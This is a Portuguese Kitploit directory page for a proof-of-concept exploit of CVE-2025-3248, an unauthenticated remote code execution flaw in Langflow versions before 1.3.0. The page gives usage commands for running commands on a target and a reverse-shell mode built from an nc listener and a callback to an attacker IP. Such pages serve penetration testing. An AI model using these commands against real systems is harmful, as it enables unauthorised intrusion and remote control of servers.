Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
langflow-exploit — PoC para CVE-2025-3248: RCE não autenticado no Langflow < 1.3.0 via /api/v1/validate/code. | Kitploit
Ferramentas/GitHubGitHub/preemware/langflow-exploit
Geração de PayloadsExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubpreemware/langflow-exploit

langflow-exploit

PoC para CVE-2025-3248: RCE não autenticado no Langflow < 1.3.0 via /api/v1/validate/code.

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-3248 - Endpoint de Validação de Código do Langflow com RCE

Um exploit de prova de conceito que demonstra uma vulnerabilidade de execução remota de código no endpoint de validação de código do Langflow. Esta vulnerabilidade afeta versões do Langflow anteriores à 1.3.0, permitindo que atacantes não autenticados executem código arbitrário através de requisições HTTP elaboradas.

Detalhes da Vulnerabilidade

  • ID do CVE: CVE-2025-3248
  • Versões Afetadas: < 1.3.0
  • Vetor de Ataque: Remoto
  • Autenticação Necessária: Não
  • Impacto: Execução Remota de Código (RCE)
  • Endpoint: /api/v1/validate/code

Pré-requisitos

  • Python 3.x
  • Pacotes Python necessários:
    • requests
    • colorama

Instalação

  1. Clone o repositório:
root@kitploit:~
git clone https://github.com/preemware/langflow-exploit
cd langflow-exploit
  1. Instale as dependências:
root@kitploit:~
pip install requests colorama

Uso

O exploit suporta dois modos de operação:

1. Modo de Execução de Comandos

Execute um único comando no sistema alvo:

root@kitploit:~
python3 cve-2025-3248.py cmd <target_url> "<command>"

Exemplo:

root@kitploit:~
python3 cve-2025-3248.py cmd http://target:7860 "id"

2. Modo Reverse Shell

Inicie um reverse shell interativo:

  1. Primeiro, inicie um listener na sua máquina:
root@kitploit:~
nc -lvnp 4444
  1. Depois execute o exploit:
root@kitploit:~
python3 cve-2025-3248.py shell <target_url> <your_ip> <your_port>

Exemplo:

root@kitploit:~
python3 cve-2025-3248.py shell http://target:7860 10.0.0.5 4444
Baixar ferramenta